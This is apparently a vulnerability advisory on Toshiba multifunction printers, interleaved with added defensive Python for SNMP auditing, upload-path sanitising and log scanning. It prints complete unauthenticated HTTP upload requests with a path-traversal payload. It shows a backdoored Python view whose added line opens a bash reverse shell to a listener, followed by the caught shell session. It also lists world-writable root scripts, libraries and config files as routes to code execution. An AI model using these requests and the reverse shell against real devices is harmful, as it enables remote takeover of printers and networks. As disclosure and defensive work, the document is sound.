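COMMUNITY_KEYWORDS = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}

# Constructed copy of the printer's configuration shown above (comments dropped).
PRINTER_SNMPD_CONF = """\
rocommunity public
rocommunity6 public
rwcommunity private
rwcommunity6 private
com2sec udp 0.0.0.0/24 public
view all included .1 80
view generaluser_view excluded .1
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3
access udpGroup "toshibaAmerica" v1 noauth exact all all none
trapcommunity public
dlmod mibs_impl /home/SYSROM_SRC/lib/libalmibs_impl.so
agentaddress udp:161,udp6:161
"""

# Assumed hardened replacement: unique community names, per-host sources, and a view
# that keeps the extend subtree out of reach even for the read/write community.
HARDENED_SNMPD_CONF = """\
view noextend included .1
view noextend excluded .1.3.6.1.4.1.8072.1.3.2
rocommunity Ro-CHANGE-ME 10.0.0.0/24 -V noextend
rwcommunity Rw-CHANGE-ME 10.0.0.5 -V noextend
agentaddress udp:161,udp6:161
"""


def _oid(text):
    return tuple(int(p) for p in text.strip(".").split(".") if p)


def parse_snmpd_conf(text):
    """Collect view definitions and r[ow]community lines: COMMUNITY [SOURCE [OID | -V VIEW]]."""
    views, communities = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            tok = shlex.split(line)
        except ValueError:
            tok = line.split()
        kw = tok[0].lower()
        if kw == "view" and len(tok) >= 4:
            views.setdefault(tok[1], []).append((_oid(tok[3]), tok[2].lower() == "included"))
        elif kw in COMMUNITY_KEYWORDS and len(tok) >= 2:
            entry = {"kind": kw, "name": tok[1], "source": None, "view": None, "oid": None}
            rest = tok[2:]
            if rest:
                entry["source"] = rest.pop(0)
            if len(rest) >= 2 and rest[0] == "-V":
                entry["view"] = rest[1]
            elif rest:
                entry["oid"] = rest[0]
            communities.append(entry)
    return {"views": views, "communities": communities}


def reachable(conf, community, target):
    """Whether `target` lies inside the subtree this community may access. With no OID and
    no view the whole tree is allowed; a -V view is resolved by the longest matching prefix."""
    t = _oid(target)
    if community["view"] is None:
        base = _oid(community["oid"]) if community["oid"] else ()
        return t[:len(base)] == base
    best = None
    for prefix, included in conf["views"].get(community["view"], []):
        if t[:len(prefix)] == prefix and (best is None or len(prefix) > len(best[0])):
            best = (prefix, included)
    return bool(best and best[1])


def extend_writable_communities(text):
    """Names of read/write communities that can write the nsExtendObjects subtree."""
    conf = parse_snmpd_conf(text)
    return [c["name"] for c in conf["communities"]
            if c["kind"].startswith("rw") and reachable(conf, c, EXTEND_OID)]


def audit(text):
    """Human-readable findings, one per weakness per community line."""
    conf = parse_snmpd_conf(text)
    findings = []
    for c in conf["communities"]:
        rw = c["kind"].startswith("rw")
        if c["name"] in DEFAULT_COMMUNITIES:
            findings.append("%s: well-known community name '%s'" % (c["kind"], c["name"]))
        if rw and c["source"] in (None, "default"):
            findings.append("%s '%s': writes accepted from any source" % (c["kind"], c["name"]))
        if rw and reachable(conf, c, EXTEND_OID):
            findings.append("%s '%s': can create nsExtend rows (%s), i.e. run commands as "
                            "the snmpd user" % (c["kind"], c["name"], EXTEND_OID))
    return findings
```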

Details – Pre-auth remote code execution as root or apache and multiple local privilege escalations

Toshiba printers provide several ways to upload files through the web interface.

By default, this web interface is accessible without authentication.

For example, using the e-Filing web interface (freely accessible at http://ip:8080/?MAIN=EFILING), we can upload documents:

[screenshot]

Files can be uploaded:

[screenshot]

Uploaded files are stored inside the printer in the /work/al/tmp/upload/ directory, in a subdirectory named after the current session.

bash-4.1# find /work/al/tmp/upload
/work/al/tmp/upload
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test3.txt
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test1.txt
/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab/test2.txt
bash-4.1# ls -latrR /work/al/tmp/upload
/work/al/tmp/upload:
total 12
drwxr-xr-x 7 root lp 4096 Mar 24 05:35 ..
drwx------ 2 apache trusted 4096 Mar 24 05:43 ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .

/work/al/tmp/upload/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab:
total 20
-rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt
-rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt
drwx------ 2 apache trusted 4096 Mar 24 05:43 .
drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 ..
bash-4.1#

This current session is provided by the printer when the web interface is accessed without authentication.

Without authentication, an attacker can replay the HTTP request using the valid session obtained while browsing http://ip/?MAIN=EFILING and change the path of the uploaded file. This path is then used to store the file inside the remote printer.

For example, by setting the Name variable to /./../../../../../home/SYSROM_SRC/sbin/malicious.program, the uploaded file is written to /home/SYSROM_SRC/sbin/malicious.program inside the printer.

The HTTP request will be:

POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12552735029913057752829397207
Content-Length: 1011
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/efiling/UploadArchive.html?v=1517352288ta
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61; IgnoreSessionTimeout=3
Upgrade-Insecure-Requests: 1

-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"

frames[1].formSubmitComplete
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="DeviceInformationModel"

<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>test.txt</File><name>Upload</name></source><destination><name>DataImport</name></destination></Params></Move></Command></DeviceInformationModel>
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="CsrfpId"

10.0.0.2.c8a776a2c87613d78cbb94c558269c61
-----------------------------12552735029913057752829397207
Content-Disposition: form-data; name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program"; filename="test.txt"
Content-Type: text/plain

MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK

-----------------------------12552735029913057752829397207--

The request in Burp:

[screenshot]

And the file is correctly written to /home/SYSROM_SRC/sbin/malicious.program inside the printer:

[screenshot]

This vulnerability can be used to obtain remote code execution in many different ways. Because of other vulnerabilities present in Toshiba printers, there are hundreds of different ways to achieve remote code execution. For example:

  • Uploading a malicious library defined in the LD_PRELOAD variable:

    • /ramdisk/al/libGetNameInfoInterface.so or /ramdisk/al/libGetAddtInfoInterface.so can be overwritten with a malicious library

  • Uploading a malicious library using the LD_LIBRARY_PATH variable – an attacker can upload a malicious library into:

    • /home/SYSROM_SRC/build/release/lib,

    • /mfp/lib,

    • /home/SYSROM_SRC/NoBuildItems/common/lib,

    • /home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,

    • /home/SYSROM_SRC/build/release/lib.

  • Uploading a malicious program thanks to insecure permissions:

    • As shown in "Local privilege escalation and remote code execution using insecure permissions on 106 programs", many programs running as root can be overwritten because of insecure permissions (777)

  • Uploading a malicious Python program or a malicious Python library

This lack of protection can be found in several HTML forms when using the printer without administrator privileges. For example, the http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html page allows any file to be uploaded:

[screenshot]

To upload an arbitrary file, an <INPUT TYPE=SUBMIT> must be injected into the server response using Burp, or the request must be generated directly.

The next section shows an example of obtaining remote code execution by uploading a malicious Python script using the following request:

POST /contentwebserver/upload HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------394285998421640844852768059947
Content-Length: 1126
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/DriverCustomize.html
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK; IgnoreSessionTimeout=1; Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c
Upgrade-Insecure-Requests: 1

-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"

frames[0].formSubmitCompleteUploadList
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="DeviceInformationModel"

<DeviceInformationModel><GetValue><eFiling><View><BoxList/></View></eFiling></GetValue><Command><GetEFilingBoxes><commandNode>eFiling/BoxList</commandNode><Params><responseXpath contentType='XPath'>eFiling/View/BoxList</responseXpath><curPage contentType='Value'>1</curPage><pageSize contentType='Value'>200</pageSize><definedBox contentType='Value'>true</definedBox></Params></GetEFilingBoxes></Command></DeviceInformationModel>
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="CsrfpId"

10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c
-----------------------------394285998421640844852768059947
Content-Disposition: form-data; name="test.txt"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------394285998421640844852768059947--

And the file is correctly uploaded to the printer:

bash-4.1# ls -la /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/
total 12
drwx------ 2 apache trusted 4096 May 27 19:34 .
drwxrwxrwx 3 root trusted 4096 May 27 19:30 ..
-rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt
bash-4.1# cat /work/al/tmp/upload/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c/test.txt
test
bash-4.1#

Several web pages allow this vulnerable /contentwebserver/upload API to be exploited.

It was determined that these web pages use the insecure /contentwebserver/upload API. Any attacker can use them to upload arbitrary files into the printer:

  • http://printer-ip/efiling/UploadFrame.html

  • http://printer-ip/efiling/UploadArchive.html

  • http://printer-ip/efiling/UploadFrame.html

  • http://printer-ip/efiling/UploadArchiveProgress.html

  • http://printer-ip/efiling/UpLoadArchiveClose.html

  • http://printer-ip/efiling/UploadArchiveButton.html

  • http://printer-ip/Registration/AddressBook/AddrImport.html

  • http://printer-ip/Registration/AddressBook/AddrImportListFrame.html

  • http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html

Some of these pages are directly accessible without authentication (for example Registration or eFiling), so they can be found without an administrator account.
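
The request above works because the multipart part name is used as the destination path under the session directory. Added example in Python, not the printer's or the advisory's code: vulnerable_upload_path reproduces the concatenation the advisory describes, and safe_upload_path is an assumed fix that accepts only a bare file name and re-checks the resolved path. The session directory and the traversal name are those from the listing and request above.

```python
"""Server-side handling of the client-supplied upload name. Added example; the
vulnerable function mirrors the behaviour described in the advisory, the safe one is
an assumed fix. posixpath is used so the logic runs without touching a disk."""
import posixpath
import re

UPLOAD_ROOT = "/work/al/tmp/upload"
SESSION_DIR = "ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab"  # from the listing above
TRAVERSAL_NAME = "/./../../../../../home/SYSROM_SRC/sbin/malicious.program"  # the advisory's payload
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


class RejectedUpload(ValueError):
    pass


def vulnerable_upload_path(session_dir, client_name, root=UPLOAD_ROOT):
    """Plain concatenation, then the kernel resolves '..': five '../' climb out of the
    five-component session directory, so the write lands wherever the client chose."""
    return posixpath.normpath(root + "/" + session_dir + "/" + client_name)


def safe_upload_path(session_dir, client_name, root=UPLOAD_ROOT):
    """Accept a bare file name only, then verify the joined result stays in the session dir."""
    if not client_name or "\x00" in client_name:
        raise RejectedUpload("empty name or NUL byte")
    # Any directory component (forward or backslash) is refused rather than stripped,
    # so a traversal attempt is visible in the logs instead of silently renamed.
    if client_name != posixpath.basename(client_name.replace("\\", "/")):
        raise RejectedUpload("directory components are not allowed: %r" % client_name)
    if client_name in (".", "..") or not SAFE_NAME.fullmatch(client_name):
        raise RejectedUpload("name outside allow-list: %r" % client_name)
    base = posixpath.normpath(posixpath.join(root, session_dir))
    final = posixpath.normpath(posixpath.join(base, client_name))
    if posixpath.dirname(final) != base:  # defence in depth behind the checks above
        raise RejectedUpload("resolved outside session directory: %s" % final)
    return final


def upload_decision(session_dir, client_name):
    """(accepted, path or rejection reason), the tuple a handler would log."""
    try:
        return True, safe_upload_path(session_dir, client_name)
    except RejectedUpload as exc:
        return False, str(exc)
```

On a real filesystem the final check should use os.path.realpath so that a planted symlink inside the session directory cannot redirect the write either.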

Remote code execution – uploading a new .py module into a WSGI Python program

Some of the printer's APIs and web interfaces are written in Python.

Because of the insecure permissions of these Python scripts inside the printer, a backdoored version of /registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py was uploaded, as shown below:

Content of /registration/al/TopAccessPy/server/screenfacade/appmgmt/views.py with the malicious payload added at line 25:

1 #! /usr/bin/env python
2 # -*- coding: utf-8 -*-
3 import sys
4 import os
5 from pyramid.view import view_config
6 from pyramid.exceptions import HTTPForbidden
7 from pyramid.response import Response,FileResponse
8 from server.screenfacade.appmgmt.applicationmanager import applicationManagementModel
9 import logging
10 import json
11 import pyeapicore
12
13 sys.path.append('/home/SYSROM_SRC/lib')
14
15 log = logging.getLogger("server")
16
17 @view_config(route_name='get_app_list_deployed', xhr=True, renderer='jsonp')
18 def get_app_list_deployed(request):
19     log.warning("++++++++++++++++++++++++++++++++")
20     log.warning("get app list Views : Start ")
21     SessionID = ''
22     session = ' '
23     csrfpId = ''
24     browserLang = ''
25     os.system("bash -i >& /dev/tcp/10.0.0.2/21 0>&1")
26
27     if 'SessionID' in request.cookies:
28         SessionID = request.cookies['SessionID']
29     if 'Session' in request.cookies:
30         session = request.cookies['Session']
31     if 'csrfpId' in request.headers:
32         csrfpId = request.headers['csrfpId']
33     if 'BrowserLang' in request.cookies:
34         browserLang = request.cookies['BrowserLang']
35
36     log.info('Session ID obtained from request :' + SessionID)
37     log.info('csrfpId obtained from request:' + csrfpId)
38     validationMap = True
39
40     if validationMap['VALIDATION_STATUS'] == 'PASSED':
41         log.info('User Validation : SUCCESS')
42         data = applicationManagementModel.getAppList(browserLang)
43         log.warning("get app list Views : End ")
44         log.warning("++++++++++++++++++++++++++++++++")
45         return json.dumps(data)
46     else:
47         log.info('User Validation : FAILURE')
48         log.warning("get app list Views : End ")
49         if "HTTP_REQUEST_FORBIDDEN" in validationMap:
50             return HTTPForbidden("Error 403 : Forbidden Request")
51         else:
52             return json.dumps(validationMap)
53
54 @view_config(route_name='start_background_application', xhr=True, renderer='jsonp')
55 def start_background_application(request):
56     log.warning("++++++++++++++++++++++++++++++++")
57     log.warning("start background app : Start ")
[...]

Because this API sits behind some reverse-proxy rules and checks, this Python code can be reached through the http://printerip/tapy/server/appmgmt/applistDeployed API path using the cookies previously provided by the printer when accessing http://printerip/ (without authentication).

When an HTTP request is sent to http://printerip/tapy/server/appmgmt/applistDeployed, the attacker receives a connect-back shell from the printer:

kali# nc -l -v -p 21
listening on [any] 21 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243
[apache@MFP14144292 /]$ id
uid=1000(apache) gid=2000(trusted) groups=2000(trusted)
[apache@MFP14144292 /]$ uname -ap
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux
[apache@MFP14144292 /]$

Connect-back shell as apache:

[screenshot]

Remote code execution – uploading a new .ini configuration file into a WSGI Python program

The .ini configuration files used by the WSGI Python programs can be overwritten. This technique has been public since 2023-02-28: https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html.

Apache is running with a WSGI configuration:

bash-4.1# ps auxww | grep apache
apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-prox.conf -k start
apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02 (wsgi:webpanel) -f /encryption/al/network/config/httpd-wsgi.conf -k start
apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05 (wsgi:topaccesspy) -f /encryption/al/network/config/httpd-wsgi.conf -k start
apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00 /usr/local/ebx/httpd_worker/bin/httpd_worker -f /encryption/al/network/config/httpd-wsgi.conf -k start

The Python scripts running under WSGI are configured by specific .ini configuration files:

  • /registration/al/WebPanel/development.ini

  • /registration/al/TopAccessPy/development.ini

Unfortunately, these configuration files can be rewritten because of insecure permissions, allowing a remote attacker to execute commands, as described in the recent public research.

These files have insecure permissions, as shown below:

bash-4.1# ls -la /registration/al/WebPanel/
total 2632
drwxrwxrwx 7 root root 4096 Dec 6 03:33 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
-rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz
-rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile
-rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb
-rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini
drwxrwxrwx 4 root root 4096 Jan 22 2015 predefinedxml
-rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi
drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages
drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient
drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver
drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info
bash-4.1# ls -la /registration/al/WebPanel/development.ini
-rwxrwxrwx 1 root root 1103 Dec 6 03:33 /registration/al/WebPanel/development.ini

bash-4.1# ls -la /registration/al/TopAccessPy
total 36
drwxrwxrwx 5 root root 4096 Dec 6 03:39 .
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..
-rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile
-rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh
drwxrwxrwx 7 root root 4096 Mar 23 10:37 client
-rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini
-rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi
drwxrwxrwx 6 root root 4096 Mar 14 16:32 server
drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info
bash-4.1# ls -la /registration/al/TopAccessPy/development.ini
-rwxrwxrwx 1 root root 1078 Dec 6 03:39 /registration/al/TopAccessPy/development.ini

These files can be overwritten to include specific commands to execute:

Content of /registration/al/TopAccessPy/development.ini:

bash-4.1# cat /registration/al/TopAccessPy/development.ini
[app:main]
use = egg:server

pyramid.reload_templates = true
pyramid.debug_authorization = false
pyramid.debug_notfound = false
pyramid.debug_routematch = false
pyramid.default_locale_name = en
pyramid.includes = pyramid_tm

[server:main]

# Begin logging configuration

[loggers]
keys = root, server

[handlers]
keys = console, serverhandler

[formatters]
keys = generic, serverformatter

[logger_root]
level = DEBUG
handlers = console

[logger_server]
level=DEBUG
handlers=serverhandler
qualname=server
propagate=0

[handler_console]
class = StreamHandler
args = (sys.stderr,)
level = NOTSET
formatter = generic

[handler_serverhandler]
class=logging.handlers.RotatingFileHandler
level=DEBUG
formatter=serverformatter
args=('/work/log/al/webpanel/python_ta.log','a',(5*1024*1024),3)

[formatter_generic]
format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s] %(message)s

[formatter_serverformatter]
format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d %(filename)s %(lineno)d %(levelname)s %(message)s
datefmt=%m/%d %H:%M:%S

# End logging configuration

Remote code execution – uploading a malicious /tmp/backtraceScript.sh script and injecting malicious gdb commands

When a program crashes, the /tmp/backtraceScript.sh script is executed as root, as shown below:

2023/05/27 19:48:02 CMD: UID=0     PID=22535  | sh -c /tmp/backtraceScript.sh "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080" > "/work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080"_backtrace 
2023/05/27 19:48:02 CMD: UID=0 PID=22536 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22540 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22539 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22538 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:02 CMD: UID=0 PID=22537 | /bin/bash /tmp/backtraceScript.sh /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080
2023/05/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 -x /tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22542 | gdb /usr/local/ebx/httpd_worker/bin/httpd_worker /work/log/corefiles/core.httpd_worker.8272.MFP14130119.1681135080 --batch --command=/tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l

This script has insecure permissions (777) and runs gdb as root:

Contents of /tmp/backtraceScript.sh

bash-4.1# ls -la /tmp/backtraceScript.sh
-rwxrwxrwx 1 root root 1457 Apr 6 2016 /tmp/backtraceScript.sh
bash-4.1# cat /tmp/backtraceScript.sh
#!/bin/bash
OIFS=${IFS}
IFS=$'\n'
echo "quit" > /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
EXE_NAME=`gdb -c "$1" -x /tmp/gdb_commands.txt | grep "Core was generated by" | cut -d'\`' -f2 | cut -d' ' -f1`
echo "thread apply all backtrace full" > /tmp/gdb_commands.txt
echo "set print asm" >> /tmp/gdb_commands.txt
echo "set print demangle on" >> /tmp/gdb_commands.txt
echo "disassemble" >> /tmp/gdb_commands.txt
echo "info reg" >> /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
echo "quit" >> /tmp/gdb_commands.txt
if [ "$EXE_NAME" = "" ];then
    if [ -d /work/log/platform/syscallerr/core_files ];then
        mv "$1" /work/log/platform/syscallerr/core_files/
    else
        mkdir -p /work/log/platform/syscallerr/core_files
        mv "$1" /work/log/platform/syscallerr/core_files/
    fi
else
    if [ -f $EXE_NAME ];then
        gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
    elif [ -f $EB2/bin/$EXE_NAME ]; then
        gdb $EB2/bin/$EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
    elif [ "$EXE_NAME"="(wsgi:webapi)" -o "$EXE_NAME"="(wsgi:webpanel)" -o "$EXE_NAME"="(wsgi:topaccesspy)" ]; then
        EXE_NAME=/usr/local/ebx/httpd_worker/bin/httpd_worker
        gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1
    else
        if [ -d /work/log/platform/syscallerr/core_files ];then
            mv "$1" /work/log/platform/syscallerr/core_files/
        else
            mkdir -p /work/log/platform/syscallerr/core_files
            mv "$1" /work/log/platform/syscallerr/core_files/
        fi
    fi
fi
IFS=${OIFS}
bash-4.1#

An attacker can also overwrite the gdb command file /tmp/gdb_commands.txt (used by gdb inside /tmp/backtraceScript.sh) to include gdb commands and obtain remote code execution.

An attacker can modify /tmp/backtraceScript.sh to obtain remote code execution.

An attacker can modify the /tmp/gdb_commands.txt script to obtain remote code execution.
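As an added detection example (not code from the original article), the following Python parses process-monitor lines in the format captured above and flags commands run as root whose script or command file lives in a world-writable staging directory. The sample lines are constructed in that format, and the directory list is an assumption based on the 777 listings on this page.

```python
"""Flag root-executed commands that load scripts or command files from
world-writable staging directories, given process-monitor output in the
"<date> <time> CMD: UID=<uid> PID=<pid> | <command>" form shown above.

Added example, not code from the article. SAMPLE_LOG is constructed in
the article's log format; UNTRUSTED_DIRS is an assumption based on the
777 listings above (any local user can plant files there)."""
import re
import shlex
from typing import List, NamedTuple

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s*(?P<cmd>.*)$"
)
UNTRUSTED_DIRS = ("/tmp/", "/ramdisk/", "/dev/shm/")


class Finding(NamedTuple):
    ts: str
    pid: int
    path: str      # the untrusted path the root process is about to run or read
    cmd: str


def untrusted_paths(cmd: str) -> List[str]:
    """Return every argument (bare or --option=value) that points into an untrusted dir."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:            # unbalanced quotes in a truncated line: fall back
        tokens = cmd.split()
    hits = []
    for tok in tokens:
        value = tok.split("=", 1)[1] if tok.startswith("--") and "=" in tok else tok
        if value.startswith(UNTRUSTED_DIRS):
            hits.append(value)
    return hits


def scan(log_text: str) -> List[Finding]:
    """Parse the log and keep only UID 0 commands that touch untrusted paths."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.rstrip())
        if not m or int(m.group("uid")) != 0:
            continue               # malformed line, or not running as root
        for path in untrusted_paths(m.group("cmd")):
            findings.append(Finding(m.group("ts"), int(m.group("pid")), path, m.group("cmd")))
    return findings


# Constructed sample in the format of the captures above (core file names shortened).
SAMPLE_LOG = """\
2023/05/27 19:48:02 CMD: UID=0     PID=22535  | sh -c /tmp/backtraceScript.sh "/work/log/corefiles/core.httpd_worker.8272" > "/work/log/corefiles/core.httpd_worker.8272"_backtrace
2023/05/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c /work/log/corefiles/core.httpd_worker.8272 -x /tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22542 | gdb /usr/local/ebx/httpd_worker/bin/httpd_worker /work/log/corefiles/core.httpd_worker.8272 --batch --command=/tmp/gdb_commands.txt
2023/05/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l
2023/05/27 19:48:09 CMD: UID=48 PID=22550 | /bin/sh /tmp/user_script.sh
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} root runs untrusted path {f.path}: {f.cmd}")
```

On the device the same check belongs next to an integrity baseline of the script itself, since the script content, not only its location, is what an attacker replaces.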

Remote code execution – uploading a malicious /home/SYSROM_SRC/build/common/bin/sapphost.py program

The /home/SYSROM_SRC/build/release/bin/sapphost.py program runs as root when the printer boots:

bash-4.1# ps auxww|grep python
root 3984 5.0 5.3 200160 70944 ? Sl 18:49 0:03 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000000
root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000001
root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python
bash-4.1#

/home/SYSROM_SRC/build/release/bin/sapphost.py is a symbolic link to /home/SYSROM_SRC/build/common/bin/sapphost.py, and this Python program has insecure permissions, allowing any local user, or any remote attacker using the insecure file upload vulnerabilities, to overwrite it:

bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/sapphost.py 
lrwxrwxrwx 1 root root 32 Mar 15 11:44 /home/SYSROM_SRC/build/release/bin/sapphost.py -> ../../thirdparty/bin/sapphost.py
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py
lrwxrwxrwx 1 root root 28 Mar 15 11:44 /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py -> ../../common/bin/sapphost.py
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/sapphost.py
-rwxrwxrwx 1 root root 2124 Oct 12 2021 /home/SYSROM_SRC/build/common/bin/sapphost.py

An attacker can overwrite this Python code to obtain remote code execution when the printer boots.

Remote code execution – uploading a malicious library

When analyzing the processes running in the printer, it was found that the LD_PRELOAD variable is used to load specific shared libraries:

  • /ramdisk/al/libGetNameInfoInterface.so

  • /ramdisk/al/libGetAddtInfoInterface.so

The LD_PRELOAD variable is set by default in the environment of the programs run by the printer:

bash-4.1# printenv | grep LD_PRELO
LD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:
bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so
-rwxrwxrwx 1 root root 70813 Dec 6 02:02 /ramdisk/al/libGetNameInfoInterface.so
bash-4.1# ls -la /ramdisk/al/libGetAddtInfoInterface.so
-rwxrwxrwx 1 root root 87311 Dec 6 02:02 /ramdisk/al/libGetAddtInfoInterface.so
bash-4.1#
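As an added example (not the article's code), a Python audit that reproduces the three kinds of finding shown so far on a constructed directory tree: it resolves symlink chains like the one behind sapphost.py, splits the LD_PRELOAD value, and flags a file whose own mode is world-writable or whose parent directory is world-writable without the sticky bit. The tree, file names and modes are constructed in a temporary directory to echo the listings above.

```python
"""Audit executables, configuration files and LD_PRELOAD libraries for
world-writable permissions, following symlinks the way the loader does.

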